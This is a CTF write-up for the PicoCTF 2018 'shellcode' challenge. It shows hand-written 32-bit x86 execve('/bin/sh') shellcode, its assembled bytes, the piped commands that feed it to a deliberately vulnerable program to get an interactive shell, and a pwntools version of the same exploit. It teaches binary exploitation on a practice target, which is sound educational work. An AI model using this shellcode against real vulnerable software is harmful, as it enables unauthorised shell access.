PicoCTF 2018 - Shellcode

Note: This article is part of our PicoCTF 2018 BinExp Guide.

Spot the Bug

This one isn’t so much a bug as an giant intentional gaping hole:

char buf[BUFSIZE];

puts("Enter a string!");

// ...
gets(buf);
puts(buf);
// ...

puts("Thanks! Executing now...");

((void (*)())buf)();

Basically, the raw input is read until the first newline (0x0A) and stored in the buffer buf. We then attempt to call buf as if it were a function. This is a highly contrived example (modern code would not have the stack segment be marked executable, and would segfault before ever running an instruction). However, it is a beautiful blank canvas for us to learn how to hand-craft some shellcode.

Strategy

The strategy here is pretty simple - If we can fill the buf with bytes that look like code, then that code will be executed.

The “classic” shellcode example is something like this (c99):

execve("/bin/sh", (char*[]){NULL}, (char*[]){NULL});

But sometimes, you’ll see this written:

execve("/bin/sh", 0, 0);

Which will also work (on linux ONLY). The difference is that first one uses a pointer to an array that contains a null, in the later the pointer itself is null. Linux allows the later, but strictly speaking the former is the correct form of invoking execve without any argv or envp.

If you can fill buf with the machine code corresponding with a call to execve like that, then the current program will be replaced with "/bin/sh" and you will have access to a shell. If you’re already sitting on some sweet shellcode, then go ahead and attempt /problems/shellcode_2_0caa0f1860741079dd0a66ccf032c5f4 on the shell server now.

Background Info

When compiling c code, execve is normally linked into libc, but ultimately, the call itself is performed by the kernel. In fact, the kernel has it’s own implementation of exactly the execve function and we can request that the kernel execute that function by performing a system call. Exactly what system calls are available, and how you call them, varies by platform. For 32-bit x86 programs, the exact system calls available ultimately depend on your kernel sources, but there exist tables that have done the work for you and present everything in a simple way.

Looking for SYS_execve, we see for 32-bit linux systems the syscall number is 0x0b (11). This value goes into the eax register. Likewise, a pointer to the filename goes into ebx, a pointer to the argv[] goes into ecx, and a pointer to the envp[] array goes into edx. On 32-bit x86 linux, a system call can be requested by executing the “int 0x80” instruction, which is a software interrupt (number 0x80). NOTE: There are other methods of invoking a system call as well, including sysenter and vDSO, but the software interrupt is simplest (and slowest) method.

We also note that we are executing buf directly, and that it’s value isn’t copied around first using something like strcpy or strdup. Therefore, we don’t have to worry about the buffer being truncating after nulls, because gets() itself will continuing copying past any null bytes up-to the first newline ('\n' == 0x0A). Therefore, the only “illegal” character that our shellcode should not contain is a newline.

Now that we have all the information we need, let’s craft some shellcode by hand. Here, I’ll be using nasm to compile my assembly code (text) into machine code (binary bytes corresponding with opcodes).

; ~/exploit_shell.S

USE32 ; Directive for nasm to indicate this is 32 bit code

; execve("/bin/sh", (char*[]){NULL}, (char*[]){NULL})

push 0x0068732f ; pushes bytes "/sh" + '\0' - but represented as a little-endian 32bit dword
push 0x6e69622f ; pushes bytes "/bin" - but represented as a little-endian 32bit dword
mov ebx, esp ; ebx = stack pointer, which points at the null-terminated byte sequence "/bin/sh"

xor eax, eax ; eax = 0
push eax ; push 0

mov al, 0x0b ; eax = 0x0b (SYS_execve)

mov ecx, esp ; ecx = stack pointer, which points at a 4 byte '0' (aka NULL)
mov edx, esp ; edx = stack pointer, which points at a 4 byte '0' (aka NULL)

int 0x80 ; syscall

First off, let’s make sure it assembles, and see if the resulting machine code contains any “illegal” newlines:

$ nasm -f bin exploit_shell.S -o /dev/stdout | xxd -i
  0x68, 0x2f, 0x73, 0x68, 0x00, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3,
  0x31, 0xc0, 0x50, 0xb0, 0x0b, 0x89, 0xe1, 0x89, 0xe2, 0xcd, 0x80

$ nasm -f bin exploit_shell.S -o /dev/stdout | xxd -i | grep -c "0x0a"
0

Yay! We’ve done it. We’ve constructed some machine code that should call execve and it doesn’t contain any “illegal” chars. If it did contain illegal chars, we’d have to figure where exactly where they came from and come up with alternative assembly instructions to accomplish the same thing. For instance, if null bytes were illegal, we’d have to figure out how to change push 0x0068732f into something that didn’t contain a 0x00 when encoded. You might, for instance, do a push 0x0169722e followed by a xor dword ptr [esp], 0x01010101 - which will result in 0x0068732f ending up on the stack as desired.

Exploitation

First, cd into the problem directory /problems/shellcode_2_0caa0f1860741079dd0a66ccf032c5f4 on the shell server. Now, at this point, you’d probably be tempted to do something like this (I know I was):

$ nasm -f bin ~/exploit_shell.S -o /dev/stdout | ./vuln
Enter a string!
h/sh
Thanks! Executing now...

Well - the good news is it didn’t crash. The bad news is it didn’t give us a shell. So… What happened?

I spent a bit of time debugging this before finally giving up and switching to pwntools (which we’ll go over in a minute). Now that I’ve come back to it, I can tell you exactly what happened: everything worked exactly the way we wrote it. The problem is that after printing out the shell code, there was no more input to give /bin/sh (the stream was at EOF), so the shell immediately quits. What you need is something that still writes to stdout after the shell launches. To prove that everything is working, you can run something like this:

$ (nasm -f bin ~/exploit_shell.S -o /dev/stdout && echo && sleep 1 && echo ls) | ./vuln
Enter a string!
h/sh
Thanks! Executing now...
flag.txt  vuln  vuln.c

What this does is launch a series of commands in a subshell (that’s what the ‘(’ and ‘)’ are for). That series of commands writes out the shellcode, followed by a newline, then waits for 1 second (while /bin/sh starts), then it writes “ls”. That input is fed into the ./vuln program, which ends up turning into /bin/sh after the shellcode executes, which then prints out the content of the current directory after receiving the ls command.

Of course, that terminal still isn’t interactive. If you want one of those, you should do something like this:

$ cat - | (nasm -f bin ~/exploit_shell.S -o /dev/stdout && echo && cat -) | ./vuln
Enter a string!
h/sh
Thanks! Executing now...
ls
flag.txt  vuln  vuln.c
cat flag.txt
picoCTF{===REDACTED===}

BOOM! You’ve achieved an interactive terminal from handcrafted shellcode using nothing but an assembler.

Now that you’ve solved shellcode, head back to the PicoCTF 2018 BinExp Guide to continue with the next challenge.

Appendix - pwntools

We’ll go into pwntools more in future guides, but here’s a quick tease of how you might do this challenge with pwntools (using its built-in shellcode that is null and newline free):

$ python
Python 2.7.12 (default, Jul 21 2020, 15:19:50)
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from pwn import *
>>> context.update(arch='i386', os='linux')
>>> p = process("./vuln")
[x] Starting local process './vuln'
[+] Starting local process './vuln': pid 2676856
>>> print(shellcraft.linux.sh().rstrip())
    /* execve(path='/bin///sh', argv=['sh'], envp=0) */
    /* push '/bin///sh\x00' */
    push 0x68
    push 0x732f2f2f
    push 0x6e69622f
    mov ebx, esp
    /* push argument array ['sh\x00'] */
    /* push 'sh\x00\x00' */
    push 0x1010101
    xor dword ptr [esp], 0x1016972
    xor ecx, ecx
    push ecx /* null terminate */
    push 4
    pop ecx
    add ecx, esp
    push ecx /* 'sh\x00' */
    mov ecx, esp
    xor edx, edx
    /* call execve() */
    push SYS_execve /* 0xb */
    pop eax
    int 0x80
>>> print(enhex(asm(shellcraft.linux.sh())))
6a68682f2f2f73682f62696e89e368010101018134247269010131c9516a045901e15189e131d26a0b58cd80
>>> p.sendline(asm(shellcraft.linux.sh()))
>>> p.interactive()
[*] Switching to interactive mode
Enter a string!
jhh///sh/bin��h�4$ri1�QjY�Q��1�j
                                        X̀
Thanks! Executing now...
ls
flag.txt  vuln  vuln.c
cat flag.txt
picoCTF{===REDACTED===}